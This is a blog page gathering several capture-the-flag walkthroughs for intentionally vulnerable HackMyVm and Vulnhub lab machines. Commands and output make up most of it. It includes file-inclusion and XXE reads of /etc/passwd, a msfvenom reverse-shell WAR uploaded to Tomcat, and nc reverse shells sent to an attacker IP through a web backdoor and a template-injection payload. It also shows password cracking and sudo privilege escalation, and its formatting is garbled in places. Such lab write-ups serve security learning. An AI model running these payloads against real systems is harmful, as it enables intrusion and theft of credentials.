分类目录归档:靶场

HackMyVm Tom Walkthrough

HackMyVm Tom Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Tom

Key points: tomcat configuration and upload

Scan ports.

~ nmap -sV -sC -p-  -Pn 192.168.56.100  -oN ports.log                                      
 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-16 09:56 CST
 Nmap scan report for deathnote.vuln (192.168.56.100)
 Host is up (0.00073s latency).
 Not shown: 65532 closed ports
 PORT     STATE SERVICE VERSION
 22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 55:5f:3f:15:c7:cb:5f:09:d6:a1:f5:70:06:d0:dd:bc (RSA)
 |   256 ec:db:41:19:b8:60:bc:53:6f:c7:ef:c6:d3:ee:b9:b8 (ECDSA)
 |_  256 2e:0d:03:27:a5:2a:0b:4e:b0:6a:42:01:57:fd:a9:9f (ED25519)
 80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Debian Default Page: It works
 8080/tcp open  http    Apache Tomcat 9.0.54
 |_http-favicon: Apache Tomcat
 |_http-title: Apache Tomcat/9.0.54
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel        

<!--more-->

Enum port 80.

```bash
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log

/index.html (Status: 200) [Size: 10701]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.100/javascript/]
/tomcat.php (Status: 200) [Size: 0]


Fuzz tomcat.php.

 ```bash
~ wfuzz -u 'http://192.168.56.100/tomcat.php?FUZZ=/etc/passwd'    -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000007570:   200        27 L     39 W       1441 Ch     "filez"  

Get /etc/passwd.

```bash
~ curl 'http://192.168.56.100/tomcat.php?filez=/etc/passwd';
root:x:0:0:root:/root:/bin/bash
...
nathan:x:1000:1000:nathan,,,:/home/nathan:/bin/bash
...
tomcat:x:1001:1001::/opt/tomcat:/bin/false


We need to get home dir of tomcat.

 ```bash
~ curl 'http://192.168.56.100/tomcat.php?filez=/etc/systemd/system/tomcat.service'                    fish-0 | 0 [10:29:59]
 [Unit]
 Description=Tomcat 9 servlet container
 After=network.target

 [Service]
 Type=forking

 User=tomcat
 Group=tomcat

 Environment="JAVA_HOME=/usr/lib/jvm/default-java"
 Environment="JAVA_OPTS=-Djava.security.egd=file:///dev/urandom"

 Environment="CATALINA_BASE=/opt/tomcat/latest"
 Environment="CATALINA_HOME=/opt/tomcat/latest"
 Environment="CATALINA_PID=/opt/tomcat/latest/temp/tomcat.pid"
 Environment="CATALINA_OPTS=-Xms512M -Xmx1024M -server -XX:+UseParallelGC"

 ExecStart=/opt/tomcat/latest/bin/startup.sh
 ExecStop=/opt/tomcat/latest/bin/shutdown.sh

 [Install]
 WantedBy=multi-user.target

Check password file at tomcat HOME dir.

```bash
~ curl 'http://192.168.56.100/tomcat.php?filez=/opt/tomcat/latest/conf/tomcat-users.xml';
...
<role rolename="admin-gui"/>
<role rolename="manager-script"/>
<user username="sml" password="H4ckMyP4$$w0rD!!!" roles="admin-gui,manager-script"/>
</tomcat-users>


Generate reverse shell for tomcat and upload.

 ```bash
~ msfvenom  -p java/shell_reverse_tcp lhost=192.168.56.150 lport=1234 -f war -o rev.war      
 Payload size: 13323 bytes
 Final size of war file: 13323 bytes
 Saved as: rev.war

 ~ curl --upload-file rev.war  -u 'sml:H4ckMyP4$$w0rD!!!' 'http://192.168.56.100:8080/manager/text/deploy?path=/upload'
 OK - Desplegada aplicación en trayectoria de contexto [/upload]

Get reverse shell.

```bash
~ curl 'http://192.168.56.100:8080/upload/rev.war';
────────────────────────────────────────────────────────────────────────────────────────────────────────
~ nc -nlvp 1234 fish-0 | 0 [10:48:06]
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:52234.
id
uid=1001(tomcat) gid=1001(tomcat) grupos=1001(tomcat)


Check sudo -l.

 ```bash
tomcat@tom:/var/www/html$ sudo -l
 sudo -l
 Matching Defaults entries for tomcat on tom:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User tomcat may run the following commands on tom:
     (nathan) NOPASSWD: /usr/bin/ascii85

Read id_rsa of user nathan.

```bash
sudo -u nathan /usr/bin/ascii85 /home/nathan/.ssh/id_rsa -w 0
<~/M/P+/ODlr8PUC+;aDO&;FsnT<(.p&79M2o/M/O]:i^Ja/Q@"7ANCqj/4E<$;HZgq777JN78#4(DJ!fJ+@JXs/O`&r1G(s\6S()K2Dm...


Decode ascii85 online, then get id_rsa.

 ```bash
-----BEGIN RSA PRIVATE KEY-----
 Proc-Type: 4,ENCRYPTED
 DEK-Info: DES-EDE3-CBC,5065755920B77C45

 pbcIb9gxpAhVFNik1U4P7SK+WnXji8QFUh11KM0oL8TXesjh+eRNlkHuYBvmm7rI
 ...

Decrypt id_rsa.

```bash
~ /usr/share/john/ssh2john.py id_rsa > hash
~ john --wordlist=/usr/share/wordlists/rockyou.txt hash bash-0 | 1 [11:08:11]
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
darkness (id_rsa)
1g 0:00:00:29 81.06% (ETA: 11:09:00) 0.03336g/s 387097p/s 387097c/s 387097C/s 9405es..9405872
Session aborted


Login ssh as usr nathan, check sudo -l.

```bash
 ~ ssh nathan@192.168.56.100 -i id_rsa                                                                 john-0 | 1 [11:08:54]
 Enter passphrase for key 'id_rsa':
 Linux tom 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64
 /usr/bin/xauth:  file /home/nathan/.Xauthority does not exist
 nathan@tom:~$ sudo -l
 Matching Defaults entries for nathan on tom:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User nathan may run the following commands on tom:
     (root) NOPASSWD: /usr/bin/lftp

Get root.

nathan@tom:~$ sudo lftp
 lftp :~> !id
 uid=0(root) gid=0(root) grupos=0(root)
 lftp :~> !bash
 root@tom:/home/nathan# id;hostname
 uid=0(root) gid=0(root) grupos=0(root)
 tom
 root@tom:/home/nathan# 

HackMyVm Hat Walkthrough

HackMyVm Hat Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Hat

Key points: IPv6

Nmap scan ports.

nmap -sV -sC -p- -Pn -oN ports.log 192.168.56.100
 Nmap scan report for deathnote.vuln (192.168.56.100)
 Host is up (0.0012s latency).
 Not shown: 65532 closed ports
 PORT      STATE    SERVICE VERSION
 22/tcp    filtered ssh
 80/tcp    open     http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Debian Default Page: It works
 65535/tcp open     ftp     pyftpdlib 1.5.4
 | ftp-syst:
 |   STAT:
 | FTP server status:
 |  Connected to: 192.168.56.100:65535
 |  Waiting for username.
 |  TYPE: ASCII; STRUcture: File; MODE: Stream
 |  Data connection closed.
 |_End of status.

Scan port 80.

```bash
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
/index.html (Status: 200) [Size: 10701]
/logs (Status: 301) [Size: 315] [--> http://192.168.56.100/logs/]
/php-scripts (Status: 301) [Size: 322] [--> http://192.168.56.100/php-scripts/]


Scan php-scripts, found file.php.

 ```bash
~ gobuster dir -u http://192.168.56.100/php-scripts -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o scripts.log
 /index.html           (Status: 200) [Size: 7]
 /file.php             (Status: 200) [Size: 0]

Fuzz the param of file.php.

```bash
~ wfuzz -u 'http://192.168.56.100/php-scripts/file.php?FUZZ=/etc/passwd'; -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0

ID Response Lines Word Chars Payload

000000713: 200 26 L 38 W 1404 Ch "6"


Get user name.

 ```bash
~ curl 'http://192.168.56.100/php-scripts/file.php?6=/etc/passwd'      
 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin            
 ...
 cromiphi:x:1000:1000:cromiphi,,,:/home/cromiphi:/bin/bash

Scan folder logs. Get ftp user name from vsftpd.log

```bash
~ gobuster dir -u http://192.168.56.100/logs -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,log -b 401,403,404,500
--wildcard -o logs.log
...

/index.html (Status: 200) [Size: 4]
/vsftpd.log (Status: 200) [Size: 1834]


Bruteforce password of ftp.

```bash
 ~ hydra -l ftp_s3cr3t -P /usr/share/wordlists/rock_ascii.txt -e nsr 192.168.56.100 -s 65535  ftp -t64 -F           ...
 [65535][ftp] host: 192.168.56.100   login: ftp_s3cr3t   password: cowboy

Get 2 files: note and id_rsa.

~ cat note                                                                              

 Hi,

 We have successfully secured some of our most critical protocols ... no more worrying!

 Sysadmin

Port 22 is filtered. We can not connect it directly, but it is open. So let's try IPV6.

Modify /etc/sysctl.conf to enable IPv6. inet6 means IPv6 is enabled.

```bash
~ cat /etc/sysctl.conf
...
net.ipv6.conf.all.disable_ipv6 = 0
net.ipv6.conf.default.disable_ipv6 = 0
net.ipv6.conf.lo.disable_ipv6 = 0
~ ifconfig
...
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.56.150 netmask 255.255.255.0 broadcast 192.168.56.255
inet6 fe80::ff1:d602:48fd:2485 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:35:d5:69 txqueuelen 1000 (Ethernet)
...


Find machines in local link IPv6 network.

 ```bash
~ ping6 -c2 -n -I eth1 ff02::1  
 ping6: Warning: source address might be selected on device other than: eth1
 PING ff02::1(ff02::1) from :: eth1: 56 data bytes
 64 bytes from fe80::ff1:d602:48fd:2485%eth1: icmp_seq=1 ttl=64 time=0.033 ms
 64 bytes from fe80::a00:27ff:fe17:10a4%eth1: icmp_seq=1 ttl=64 time=0.615 ms
 64 bytes from fe80::ff1:d602:48fd:2485%eth1: icmp_seq=2 ttl=64 time=0.049 ms

Test if the machine can be visited from ipv6 address.

```bash
~ nmap -p- fe80::a00:27ff:fe17:10a4%eth1 -6
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-13 15:23 CST
Nmap scan report for fe80::a00:27ff:fe17:10a4
Host is up (0.00060s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
~ curl 'http://[fe80::a00:27ff:fe17:10a4%eth1]/index.html';
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">;
<html xmlns="http://www.w3.org/1999/xhtml">;
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Apache2 Debian Default Page: It works</title>
<style type="text/css" media="screen">
...


Decrypt id_rsa.

 ```bash
$ python2 /usr/share/john/ssh2john.py id_rsa  > crack.txt
 $ john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt
 Using default input encoding: UTF-8
 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
 Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
 Cost 2 (iteration count) is 2 for all loaded hashes
 Will run 2 OpenMP threads
 Note: This format may emit false positives, so it will keep trying even after
 finding a possible candidate.
 Press 'q' or Ctrl-C to abort, almost any other key for status
 ilovemyself      (id_rsa)
 1g 0:00:00:11 46.01% (ETA: 20:23:54) 0.09082g/s 607973p/s 607973c/s 607973C/s katim03..katilsimbu_1
 Session aborted

Login ssh through ipv6.

```bash
~ ssh cromiphi@fe80::a00:27ff:fe17:10a4%eth1 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux Hat 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
/usr/bin/xauth: file /home/cromiphi/.Xauthority does not exist
cromiphi@Hat:~$


Check sudo -l.

 ```bash
cromiphi@Hat:~$ sudo -l
 Matching Defaults entries for cromiphi on Hat:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User cromiphi may run the following commands on Hat:
     (root) NOPASSWD: /usr/bin/nmap

Get root.

```bash
cromiphi@Hat:~$ echo 'os.execute("/bin/bash -i")' > exp
cromiphi@Hat:~$ sudo nmap --script=exp
Starting Nmap 7.70 ( https://nmap.org ) at 2021-10-13 10:38 CEST
NSE: Warning: Loading 'exp' -- the recommended file extension is '.nse'.
root@Hat:/home/cromiphi# uid=0(root) gid=0(root) grupos=0(root)
Hat

HackMyVm Drippingblues Walkthrough

HackMyVm Drippingblues Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Drippingblues

Scan ports.

nmap -sV -sC -p- -oN ports.log 192.168.56.100                
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp     vsftpd 3.0.3
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 |_-rwxrwxrwx    1 0        0             471 Sep 19 18:57 respectmydrip.zip [NSE: writeable]
 | ftp-syst:                                                                  
 |   STAT:                                                                    
 | FTP server status:                                                          
 |      Connected to ::ffff:192.168.56.150
 |      Logged in as ftp
 |      TYPE: ASCII                                                                                                                                          
 |      No session bandwidth limit
 |      Session timeout in seconds is 300                      
 |      Control connection is plain text                        
 |      Data connections will be plain text                      
 |      At session startup, client count was 4      
 |      vsFTPd 3.0.3 - secure, fast, stable
 |_End of status
 22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey:
 |   3072 9e:bb:af:6f:7d:a7:9d:65:a1:b1:a1:be:91:cd:04:28 (RSA)
 |   256 a3:d3:c0:b4:c5:f9:c0:6c:e5:47:64:fe:91:c5:cd:c0 (ECDSA)
 |_  256 4c:84:da:5a:ff:04:b9:b5:5c:5a:be:21:b6:0e:45:73 (ED25519)
 80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
 | http-robots.txt: 2 disallowed entries  
 |_/dripisreal.txt /etc/dripispowerful.html
 |_http-server-header: Apache/2.4.41 (Ubuntu)
 |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Enum port 80.

```bash
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
/index.php (Status: 200) [Size: 138]
/robots.txt (Status: 200) [Size: 78]


Check index.php, get 2 user names.

```bash
 ~ curl http://192.168.56.100/index.php  
 <html>
 <body>
 driftingblues is hacked again so it's now called drippingblues. :D hahaha
 <br>
 by
 <br>
 travisscott & thugger
 </body>
 </html>⏎              

Check robots.txt, get a text file and a local html file.

~ curl http://192.168.56.100/robots.txt
 User-agent: *
 Disallow: /dripisreal.txt
 Disallow: /etc/dripispowerful.html

Login ftp anonymous, download respectmydrip.zip. Bruteforce the zip pass.

 ~ fcrackzip -u -D -p /usr/share/wordlists/rock_ascii.txt respectmydrip.zip
 PASSWORD FOUND!!!!: pw == 072528035

Unzip respectmydrip.zip, in respectmydrip.txt, get hint.

 ~ cat respectmydrip.txt
 just focus on "drip"⏎  

Fuzz index.php with param drip=/etc/dripispowerful.html. Get a password string.

 ~ curl 'http://192.168.56.100/index.php?drip=/etc/dripispowerful.html'    
 <!DOCTYPE html>
 <html>
 ...
 </style>
 password is:
 imdrippinbiatch
 ...

Try username thugger we got from index.php. Successfully login ssh.

```bash
~ ssh thugger@192.168.56.100 ...
thugger@drippingblues:~$ id
uid=1001(thugger) gid=1001(thugger) groups=1001(thugger)


The root step is use the Ubuntu Polkit Vulnerability.

Check the POC here.

https://github.com/Almorabea/Polkit-exploit

 ```bash
root@drippingblues:/home/thugger# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 drippingblues

HackMyVm Dance Walkthrough

HackMyVm Dance Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Dance

Scan ports first.

nmap -sV -sC -p- -oN ports.log 192.168.56.100
 ...
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp     vsftpd 3.0.3
 |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
 ...
 22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
 ...
 80/tcp open  http    nginx 1.18.0
 |_http-server-header: nginx/1.18.0
 |_http-title: Site doesn't have a title (text/html).
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80, found /music.

 ~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 /index.html           (Status: 200) [Size: 121]
 /music                (Status: 301) [Size: 169] [--> http://192.168.56.100/music/]

Enter /music in web browser, check information, it's a web app called musicco.

image-20210914101829803.png

Search exploit of musicco.

```bash
~ searchsploit musicco

Exploit Title | Path

Musicco 2.0.0 - Arbitrary Directory Download | php/webapps/45830.txt


Through the exploit, we can download the whole html dir as a zip file.

 ```bash
~ wget 'http://192.168.56.100/music/?getAlbum&parent=../../&album=var' -O var.zip

Unzip var.zip, check /music/config.php, get some credentials.

```bash
~ cat config.php
<?php
$_CONFIG['saveConfig'] = '';
$_CONFIG['users'] = array(
array('admin', 'admin', 'true'),
array('guest', 'guest', 'false'),
array('aria', 'seraphim', 'false'),
array('alice', 'rememberyou', 'false'),
array('ava', 'password', 'false'),
array('alba', 'thehostof', 'false'),
);
$_CONFIG['lang'] = 'en';
$_CONFIG['musicRoot'] = 'music';
$_CONFIG['coverFileName'] = 'folder';
$_CONFIG['coverExtension'] = '.png';
$_CONFIG['loadLyricsFromFile'] = 'on';
$_CONFIG['downLoadMissingCovers'] = 'on';
$_CONFIG['searchEngine'] = '';
$_CONFIG['imageSearchEngine'] = '';
?>


We can login ssh as user aria.

 ```bash
~ ssh aria@192.168.56.100
 aria@dance:~$ id
 uid=1000(aria) gid=1000(aria) groups=1000(aria),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Another user is alba, but it's nologin.

```bash
aria@dance:~$ cat /etc/passwd|grep alba
alba:x:1001:1001:,,,:/home/alba:/usr/sbin/nologin


So we need to set the login shell for alba, then escalate to user alba.

```bash
 aria@dance:~$ su -s /bin/bash alba
 Password:
 alba@dance:/home/aria$ id
 uid=1001(alba) gid=1001(alba) groups=1001(alba)

Check sudo -l.

alba@dance:/home/aria$ sudo -l
 Matching Defaults entries for alba on dance:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User alba may run the following commands on dance:
     (root) NOPASSWD: /usr/bin/espeak

The last step is to use espeak to read (or listen to) /root/root.txt.

```bash
alba@dance:/home/aria$ sudo /usr/bin/espeak -f /root/root.txt -q -X
Translate 'rootflag'


 ...

Vulnhub DoubleTrouble Walkthrough

Vulnhub DoubleTrouble Walkthrough

https://www.vulnhub.com/entry/doubletrouble-1,743/

Scan port 80.

~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,
 403,404,500 --wildcard   -o 80.log
 ===============================================================
 /uploads              (Status: 301) [Size: 318] [--> http://192.168.56.100/uploads/]
 /images               (Status: 301) [Size: 317] [--> http://192.168.56.100/images/]
 /css                  (Status: 301) [Size: 314] [--> http://192.168.56.100/css/]
 /template             (Status: 301) [Size: 319] [--> http://192.168.56.100/template/]
 /core                 (Status: 301) [Size: 315] [--> http://192.168.56.100/core/]
 /install              (Status: 301) [Size: 318] [--> http://192.168.56.100/install/]
 /js                   (Status: 301) [Size: 313] [--> http://192.168.56.100/js/]
 /index.php            (Status: 200) [Size: 5814]
 /check.php            (Status: 200) [Size: 0]
 /sf                   (Status: 301) [Size: 313] [--> http://192.168.56.100/sf/]
 /readme.txt           (Status: 200) [Size: 470]
 /robots.txt           (Status: 200) [Size: 26]
 /secret               (Status: 301) [Size: 317] [--> http://192.168.56.100/secret/]    

<!--more-->

In /secret, download doubletrouble.jpg, get password and creds.txt.

 ~ stegseek --crack -sf doubletrouble.jpg        
 StegSeek version 0.5
 Progress: 2.00% (2794835 bytes)
 [i] --> Found passphrase: "92camaro"
 [i] Original filename: "creds.txt"
 [i] Extracting to "doubletrouble.jpg.out"                    
 ~ mv doubletrouble.jpg.out creds.txt                
 ~ cat creds.txt                                                                                          otisrush@localhost.com
 otis666⏎                              

Search exploit of qdPM.

```bash
~ searchsploit qdPM

Exploit Title | Path

...
qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) | php/webapps/50175.py ...


Use POC to upload backdoor.

 ```bash
~ python3 50175.py --host 'http://192.168.56.100/' -u otisrush@localhost.com -p otis666                                              python3-0 | 1 [14:53:09]

 You are not able to use the designated admin account because they do not have a myAccount page.

 Backdoor uploaded at - > http://192.168.56.100//uploads/users/?cmd=whoami

Check if backdoor works OK.

 ~ curl 'http://192.168.56.100/uploads/users/148232-backdoor.php?cmd=whoami'
 <pre>www-data
 </pre>⏎    

Get reverse shell.

```bash
~ curl 'http://192.168.56.100/uploads/users/148232-backdoor.php?cmd=nc%20192.168.56.150%201234%20-e%20/bin/bash';
────────────────────────────────────────────────────────────────────────────────────────────────────────

~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:53330.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@doubletrouble:/var/www/html/uploads/users$


Check sudo -l.

```bash
 www-data@doubletrouble:/home$ ls -la
 ls -la
 total 8
 drwxr-xr-x  2 root root 4096 Sep 11 13:51 .
 drwxr-xr-x 18 root root 4096 Dec 17  2020 ..
 www-data@doubletrouble:/home$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on doubletrouble:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User www-data may run the following commands on doubletrouble:
     (ALL : ALL) NOPASSWD: /usr/bin/awk

Get root.

www-data@doubletrouble:/home$ sudo awk 'BEGIN {system("/bin/sh")}'
 sudo awk 'BEGIN {system("/bin/sh")}'
 # id;hostname
 id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 doubletrouble

Vulnhub Deathnote: 1 Walkthrough

Vulnhub Deathnote: 1 Walkthrough

https://www.vulnhub.com/entry/deathnote-1,739/](https://www.vulnhub.com/entry/deathnote-1,739/

Easy one, key steps here.

Get notes.txt and user.txt from http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/.

Hydra ssh credentials with these 2 files.

~ hydra -L user.txt -P notes.txt -e nsr 192.168.56.100  ssh -t20 -F                                    
 ...
 [22][ssh] host: 192.168.56.100   login: l   password: death4me                                           ...

In /opt found hint and case.wav.

```bash
l@deathnote:/opt/L/fake-notebook-rule$ ls -la
total 16
drwxr-xr-x 2 root root 4096 Aug 29 11:26 .
drwxr-xr-x 4 root root 4096 Aug 29 11:12 ..
-rw-r--r-- 1 root root 84 Aug 29 11:25 case.wav
-rw-r--r-- 1 root root 15 Aug 29 11:26 hint


Use cyberchef-->from hex, decode content of case.wav, get cGFzc3dkIDoga2lyYWlzZXZpbCA=.

Decode base64, get password of kira.

Get root

 ```bash
kira@deathnote:~$ sudo -l
 Matching Defaults entries for kira on deathnote:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User kira may run the following commands on deathnote:
     (ALL : ALL) ALL
 kira@deathnote:~$ sudo su root
 root@deathnote:/home/kira# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 deathnote
 root@deathnote:/home/kira# 

VlunHub Hacker kid: 1.0.1 Walkthrough

VlunHub Hacker kid: 1.0.1 Walkthrough

https://www.vulnhub.com/entry/hacker-kid-101,719/

Very good machine, learn some new stuff.

Scan ports, port 53 is interesting.

nmap -sV -sC -p- 192.168.33.144  -oN ports.log        
 ...
 PORT     STATE SERVICE VERSION
 53/tcp   open  domain  ISC BIND 9.16.1 (Ubuntu Linux)
 | dns-nsid:
 |_  bind.version: 9.16.1-Ubuntu
 80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
 |_http-server-header: Apache/2.4.41 (Ubuntu)
 |_http-title: Notorious Kid : A Hacker
 9999/tcp open  http    Tornado httpd 6.1
 |_http-server-header: TornadoServer/6.1
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

```bash
~ gobuster dir -u http://192.168.33.144 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,
403,404,500 --wildcard -o 80.log
...

/images (Status: 301) [Size: 317] [--> http://192.168.33.144/images/]
/index.php (Status: 200) [Size: 3597]
/css (Status: 301) [Size: 314] [--> http://192.168.33.144/css/]
/form.html (Status: 200) [Size: 10219]
/app.html (Status: 200) [Size: 8048]
/javascript (Status: 301) [Size: 321] [--> http://192.168.33.144/javascript/]


Found hints in index.php source code.

```bash
 <div class="container py-5">
   <h1>Thanks</h1>

  TO DO: Use a GET parameter page_no  to view pages.
 --></code></pre>
<p>Fuzz index.php with page_no.</p>
<pre><code class="language-bash"> ~ seq 1 100 > dic.txt
 ~ wfuzz -u 'http://192.168.33.144/index.php?page_no=FUZZ'    -w dic.txt --hh 3654
 ...
 =====================================================================                                  
 000000021:   200        116 L    310 W      3849 Ch     "21"</code></pre>
<p>Get more info with page_no=21.</p>
<pre><code class="language-bash"> ~ curl 'http://192.168.33.144/index.php?page_no=21'
 <center>
         <font color="red">

 Okay so you want me to speak something ?<br>I am a hacker kid not a dumb hacker. So i created some subdomains to return back on the server whenever i want!!<br>Out of my many homes...one such home..one such home for me : hackers.blackhat.local<br>
 <font color="red">
 </center></code></pre>
<p>Dig another domain name, write it into /etc/hosts.</p>
<pre><code class="language-bash">~ dig @192.168.33.144 hackers.blackhat.local                                                             ...
 ;; AUTHORITY SECTION:
 blackhat.local.         3600    IN      SOA     blackhat.local. hackerkid.blackhat.local. 1 10800 3600 604800 3600
 ...</code></pre>
<p>Visit hackerkid.blackhat.local, use XXE (XML External Entity) Injection.</p>
<p>```bash
~ curl '<a href="http://hackerkid.blackhat.local/process.php&#039">http://hackerkid.blackhat.local/process.php&#039</a>;     -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \'file:///etc/passwd\'>
]><root><name></name><tel></tel><email>&xxe;</email><password></password></root>'
...
saket:x:1000:1000:Ubuntu,,,:/home/saket:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
bind:x:126:133::/var/cache/bind:/usr/sbin/nologin</p>
<pre><code>
Read bachrc file with base64.

 ```bash
~ curl 'http://hackerkid.blackhat.local/process.php'     -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \'php://filter/convert.base64-encode/resource=/home/saket/.bashrc\'>]><root><name></name><tel></tel><email>&xxe;</email><password></password></root>'
 ...
 Sorry, IyB+Ly5iYXNocmM6IGV4ZWN1dGVkIGJ5IGJhc2goMSkgZm9yIG5vbi1sb2dpbiBzaGVsbHMuCiMgc2VlIC91c3Ivc2hhcmUvZG9jL2Jhc...
 IFBhc3N3b3JkIGZvciBydW5uaW5nIHB5dGhvbiBhcHAKdXNlcm5hbWU9ImFkbWluIgpwYXNzd29yZD0iU2FrZXQhIyQlQCEhIgo= is not available !!!</code></pre>
<p>Decode base64. Get password of port 9999, but should login with name "saket".</p>
<pre><code class="language-bash"> #Setting Password for running python app
 username="admin"
 password="Saket!#$%@!!"</code></pre>
<p>Login port 9999.</p>
<p>image-20210906141418214.png</p>
<p>Input param "name", get output in webpage.</p>
<p>image-20210906141454486.png</p>
<p>Enter shell code, get reverse shell through nc, then spawn a new full shell.</p>
<p>```bash
{%import os%}{{os.system("nc 192.168.33.128 1234|/bin/bash|nc 192.168.33.128 2234")}}</p>
<pre><code>
Getcap enum.

 ```bash
saket@ubuntu:~$ /sbin/getcap / -r 2>/dev/null
 /sbin/getcap / -r 2>/dev/null
